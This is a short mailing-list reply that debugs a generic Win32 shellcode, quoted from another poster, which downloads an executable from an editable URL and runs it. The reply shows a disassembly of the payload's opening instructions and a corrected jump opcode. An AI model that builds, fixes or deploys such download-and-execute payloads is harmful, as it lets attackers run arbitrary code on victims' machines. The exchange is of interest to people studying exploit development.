AW: GENERIC Win32 Shellcode

["Der HexXer" <DerHexXer () gmx net>]

> I send a generic win32 shellcode in attachment. It has a size of 800 bytes
> and have an editable URL line. It must point to an exe in internet.
> Shellcode will download it and execute. It runs in Windows
> 95/98/ME/NT/2000 and XP. The file to download has a limit of 2.2 Mb. If
> someone can test shellcode please send me an email for comment it.

Why do you have an relative jump to [ShellCode-Entry] - 7 Bytes
at the beginning of your code?
(the first jump should be EIP+11 bytes: \xEB\x0B\x...)

Debug: (added 4 nops; entry: 00401000)
  00401003 90                   nop
  00401004 EB F7                jmp         00400FFD ;???
  00401006 8D 76 17             lea         esi,[esi+17h]
  00401009 8B FC                mov         edi,esp
  0040100B 8B D7                mov         edx,edi
  0040100D F3 A4                rep movs    byte ptr [edi],byte ptr [esi]
  0040100F 52                   push        edx
  00401010 C3                   ret
  00401011 EB 30                jmp         00401043 ;eip should jump to
this address
 ;00401228 E8 E6 FD FF FF       call        00401013
=>00401013 5F                   pop         edi
  ...

Der HexXer.